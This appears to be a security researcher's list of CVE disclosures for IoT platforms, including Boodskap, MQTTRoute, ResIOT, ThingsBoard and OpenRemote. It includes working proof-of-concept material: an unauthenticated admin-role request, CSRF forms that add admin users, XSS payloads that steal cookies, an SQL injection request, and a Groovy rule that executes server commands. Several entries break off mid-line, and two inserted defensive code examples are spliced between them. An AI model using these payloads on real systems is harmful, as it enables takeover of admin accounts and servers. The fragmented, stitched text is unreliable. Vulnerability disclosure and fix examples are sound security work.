Posts

CVE-ID: CVE-2022-35613

Konker Platform is an open source platform for the Internet of Things (IoT). Versions 2.3.9 and below are vulnerable to cross-site request forgery (CSRF) attacks because CSRF protection is explicitly disabled in the Spring Security configuration: http.csrf().disable()
URL: https://github.com/KonkerLabs/konker-platform/blob/007a3eebb45a0d29581abd84322b799bc4c542d1/konker.registry.data.core/src/main/java/com/konkerlabs/platform/registry/data/core/config/SecurityConfig.java#L87
References: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html

CVE-ID: CVE-2022-35135, CVE-2022-35136

CVE-2022-35136: Boodskap IoT Platform v4.4.9-02 allows attackers to make unauthenticated API requests.
CVE-2022-35135: Boodskap IoT Platform v4.4.9-02 allows attackers to escalate privileges via a crafted request sent to /api/user/upsert/<uuid>.

The platform processes API requests even without valid cookies. For example, the following request to update a user profile is processed even though it carries no cookie or API key (the Cookie header is blank). Since API requests to the platform are not authenticated, a user can assign themselves an admin role by sending a request to the http://192.168.72.157/api/user/upsert/<userid> endpoint.

HTTP Request:
POST /api/user/upsert/8c34fa03-706a-4dc7-b484-cd8e0c329c81 HTTP/1.1
Host: 192.168.72.157
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Re
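The two controls missing from the upsert endpoint described above, as an added example that is not Boodskap's code: a framework-free request handler that rejects a request whose Cookie header carries no valid session, and that refuses a non-admin caller's attempt to set admin-only fields such as role. The user store, session store, session cookie name, field names and request shape are constructed for this example; only the target UUID comes from the request quoted in the post.

```javascript
// Added example, not Boodskap code: authentication and authorization checks
// for a POST /api/user/upsert/<uuid> handler. Stores, cookie/field names and
// the request shape are constructed; only the first UUID is from the advisory.

const UPSERT_PATH = /^\/api\/user\/upsert\/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i;

// Fields a caller may change on their own record vs. fields only an admin may set.
const SELF_EDITABLE = new Set(['firstName', 'lastName', 'email']);
const ADMIN_ONLY = new Set(['role']);

// Fresh in-memory state per run (constructed data). The admin id is made up.
function createState() {
  const users = new Map([
    ['8c34fa03-706a-4dc7-b484-cd8e0c329c81', { firstName: 'Alice', lastName: 'User', email: 'alice@example.test', role: 'user' }],
    ['0f4c2b1e-3a5d-4c6e-8f9a-1b2c3d4e5f60', { firstName: 'Root', lastName: 'Admin', email: 'admin@example.test', role: 'admin' }],
  ]);
  // session cookie value -> user id
  const sessions = new Map([
    ['s-alice', '8c34fa03-706a-4dc7-b484-cd8e0c329c81'],
    ['s-admin', '0f4c2b1e-3a5d-4c6e-8f9a-1b2c3d4e5f60'],
  ]);
  return { users, sessions };
}

function parseCookies(header) {
  const out = {};
  for (const part of String(header || '').split(';')) {
    const idx = part.indexOf('=');
    if (idx > 0) out[part.slice(0, idx).trim()] = decodeURIComponent(part.slice(idx + 1).trim());
  }
  return out;
}

// req: { method, path, headers: { cookie, 'content-type' }, body: string }
function handleUpsert(state, req) {
  if (req.method !== 'POST') return { status: 405, body: { error: 'method not allowed' } };
  const m = UPSERT_PATH.exec(req.path);
  if (!m) return { status: 404, body: { error: 'not found' } };
  const targetId = m[1].toLowerCase();

  // 1. Authentication: the advisory's request has a blank Cookie header and is
  //    still processed. A missing or unknown session must stop here.
  const sessionId = parseCookies(req.headers.cookie).session;
  const callerId = sessionId ? state.sessions.get(sessionId) : undefined;
  if (!callerId) return { status: 401, body: { error: 'authentication required' } };
  const caller = state.users.get(callerId);

  let patch;
  try { patch = JSON.parse(req.body); } catch { return { status: 400, body: { error: 'invalid JSON' } }; }
  if (patch === null || typeof patch !== 'object' || Array.isArray(patch)) {
    return { status: 400, body: { error: 'object body required' } };
  }

  // 2. Authorization: non-admins may only edit their own record and only the
  //    self-editable fields. An admin-only field from a non-admin is refused
  //    outright rather than silently dropped, so the attempt is visible.
  const isAdmin = caller.role === 'admin';
  if (!isAdmin && targetId !== callerId) return { status: 403, body: { error: 'forbidden' } };
  for (const field of Object.keys(patch)) {
    if (ADMIN_ONLY.has(field) && !isAdmin) return { status: 403, body: { error: `field ${field} requires admin` } };
    if (!SELF_EDITABLE.has(field) && !ADMIN_ONLY.has(field)) return { status: 400, body: { error: `unknown field ${field}` } };
  }

  // 3. Apply the allow-listed patch (upsert: create the record if absent).
  const current = state.users.get(targetId) || { firstName: '', lastName: '', email: '', role: 'user' };
  const updated = { ...current, ...patch };
  state.users.set(targetId, updated);
  return { status: 200, body: { id: targetId, ...updated } };
}

// Constructed requests mirroring the advisory: same endpoint, with the Cookie
// header supplied by the caller (blank, or a session cookie).
function advisoryStyleRequest(cookie, body) {
  return {
    method: 'POST',
    path: '/api/user/upsert/8c34fa03-706a-4dc7-b484-cd8e0c329c81',
    headers: { cookie, 'content-type': 'application/json' },
    body: JSON.stringify(body),
  };
}
```

Note that the role check is a separate control from authentication: even after sessions are enforced, an authenticated low-privilege user can still send {"role": "admin"} for their own id unless the handler allow-lists which fields each role may write.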

CVE-ID: CVE-2022-35134

Boodskap IoT Platform v4.4.9-02 contains a cross-site scripting (XSS) vulnerability. The application does not enforce input validation or output sanitization in multiple functionalities.
Example 1: the domain name can be set to <script>alert(1)</script>
Example 2: a lower-privileged user can change their name to include an XSS payload and target the admin user.
References: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

CVE-ID: CVE-2022-35612

A cross-site scripting (XSS) vulnerability in MQTTRoute v3.3 and below allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the dashboard name text field. It is possible to submit JavaScript in form fields as shown below. The submitted JavaScript is stored and included in the application without output encoding, leading to a stored cross-site scripting attack. As shown below, it is possible for an adversary to steal the admin session cookie via cross-site scripting.
References: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

CVE-ID: CVE-2022-35611

A Cross-Site Request Forgery (CSRF) vulnerability in MQTTRoute v3.3 and below allows attackers to create and remove dashboards. The HTTP requests issued by the application do not carry anti-CSRF tokens. As a result, an attacker can craft a malicious form which, when submitted by an unsuspecting user in a valid session, makes the server assume that the request was sent willingly by the user.
Sample PoC form to create a dashboard:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8080/bwiot/api/v1/dashboard/" method="POST">
      <input type="hidden" name="name" value="SC&lt;img&#32;src&#61;&#35;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="desc" value="ADV" />
      <input type="submit" value

CVE-ID: CVE-2022-34022

SQL injection vulnerability in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via a crafted POST request to /ResiotQueryDBActive. An admin user can execute arbitrary SQL commands and can even dump DB content. Since this endpoint is vulnerable to CSRF, an attacker can abuse CSRF in conjunction with this to execute arbitrary SQL queries on the DB.
HTTP Request:
POST /ResiotQueryDBActive/ HTTP/1.1
Host: 172.20.32.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 159
Origin: http://172.20.32.1:8088
Connection: close
Referer: http://172.20.32.1:8088/Login/
Cookie: isMobile=false; login=1; pw=4617e3d2c7ca44273258ee9c706806b6

query=<SQL_QUERY_HERE>

The following information was retrieved from a SQLMap scan on my local installatio

CVE-ID: CVE-2022-34021

Multiple cross-site scripting (XSS) vulnerabilities in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via the form fields. Upon entering text such as "<script>alert(1)</script>" in form fields, the application stores it and renders it as JavaScript code instead of text. E.g., XSS in Node Name (test<img src=# onerror=alert(1)>)
References: https://www.resiot.io/en/changelog/ (Patched Version: 4.1.1000118, Release Date: 31/08/2022)
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

CVE-ID: CVE-2022-34020

Cross Site Request Forgery (CSRF) vulnerability in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 allows attackers to add new admin users to the platform or cause other unspecified impacts. ResIOT® IOT Platform + LoRaWAN Network Server (on-premise version) V.4.1.1000114 does not use any CSRF protection mechanism, so an attacker can launch CSRF attacks against users of the platform and perform actions such as creating a user. For this, the attacker can prepare an HTML form such as the following, host it online and send the form's link to a ResIoT admin user.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://172.20.32.1:8088/UserorgApi/?domain=172.20.32.1&protocol=http:&email=test111@gmail.com&firstname=test&lastname=one&password=V79NrFNCAxZNXtg&phone=77777777777" method="POST

CVE-ID: CVE-2022-35137

DGIOT Lightweight industrial IoT v4.5.4 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities. The platform does not output-encode payloads such as <script>alert(document.cookie)</script>. These are instances of stored XSS that can be abused to steal admin user cookies.
References: https://owasp.org/www-community/attacks/xss/

CVE-ID: CVE-2022-31861

Cross-site scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs.
Patch details: https://github.com/thingsboard/thingsboard/pull/7385
Audit logs help in establishing accountability of usage among the various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of ThingsBoard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower-privileged user of the platform. According to ThingsBoard's documentation (https://thingsboard.io/docs/pe/user-guide/rbac/), on the community edition, "a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant". Each tenant has several customers and as
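The fix all of the stored XSS entries above share (Boodskap domain and user names, the MQTTRoute dashboard name, ResIOT node names, the DGIOT fields and the ThingsBoard audit-log columns) is encoding untrusted values at the point where they are written into HTML. The following is an added example and not code from any of those platforms: an HTML-context encoder, the vulnerable and the corrected rendering pattern side by side, and a small review helper that reports when a stored value reaches the markup as a live tag. The payloads are the ones quoted in the advisories; the cell templates and the audit-log entry shape are constructed for the example.

```javascript
// Added example, not code from any platform above: HTML output encoding for
// stored values, with the advisories' payloads as constructed test input.
// Rendering helpers and the audit-log entry shape are made up for the example.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Encode for HTML text content and for values inside quoted attributes
// (the characters the OWASP XSS cheat sheet lists for the HTML context).
// Ampersand is included so that stored entities cannot be smuggled through.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Stored payloads quoted in the advisories (constructed input for this example).
const ADVISORY_PAYLOADS = [
  '<script>alert(1)</script>',                      // Boodskap: domain name
  'SC<img src=# onerror=alert(document.cookie)>',   // MQTTRoute: dashboard name
  'test<img src=# onerror=alert(1)>',               // ResIOT: node name
  '<script>alert(document.cookie)</script>',        // DGIOT
];

// The pattern the advisories describe: the stored value is dropped into the
// markup untouched, so the admin's browser parses the payload as an element.
function renderNameUnsafe(name) {
  return `<td class="name">${name}</td>`;
}

// Same cell with the value encoded at output time.
function renderNameSafe(name) {
  return `<td class="name">${escapeHtml(name)}</td>`;
}

// ThingsBoard-style audit row: every user-influenced column is encoded,
// including ones that look structured such as the entity name. (Entry shape
// is constructed for the example.)
function renderAuditRow(entry) {
  const cells = [entry.timestamp, entry.user, entry.action, entry.entityName, entry.status]
    .map((v) => `<td>${escapeHtml(v)}</td>`);
  return `<tr>${cells.join('')}</tr>`;
}

// Review helper: does any untrusted value reach the markup as a live tag?
// A value leaks if it contains a tag opener and appears verbatim in the output.
function leaksLiveTag(html, untrustedValues) {
  return untrustedValues.some((v) => /<\/?[a-z!]/i.test(v) && html.includes(v));
}
```

Encoding belongs at output time, not at storage time: the same stored name may later be written into a JSON API response, a CSV export or a JavaScript string, each of which needs a different encoder, and encoding on the way in also double-encodes legitimate ampersands that the HTML encoder would otherwise handle correctly once.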

CVE-ID: CVE-2022-31860

An issue discovered in OpenRemote through 1.0.4 allows attackers to execute arbitrary code via a crafted Groovy rule. Post disclosure, OpenRemote restricted the affected functionality to a specific user role (super users, https://github.com/openremote/openremote/pull/725) to reduce the risk from unrestricted Groovy rules.
Details: The OpenRemote platform lets users create rules in three ways: When-Then, Flow and Groovy. Users can create rules by writing custom code in the Groovy programming language, and it is possible for a user of the platform to create a Groovy rule that executes arbitrary commands on the server hosting the OpenRemote platform. In the following PoC, we execute the "cat /etc/passwd" command on the hosting server and log the output of the command.
Proof of Concept:
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'cat /etc/passwd'.execute()
proc.consumeProcessOutput(sou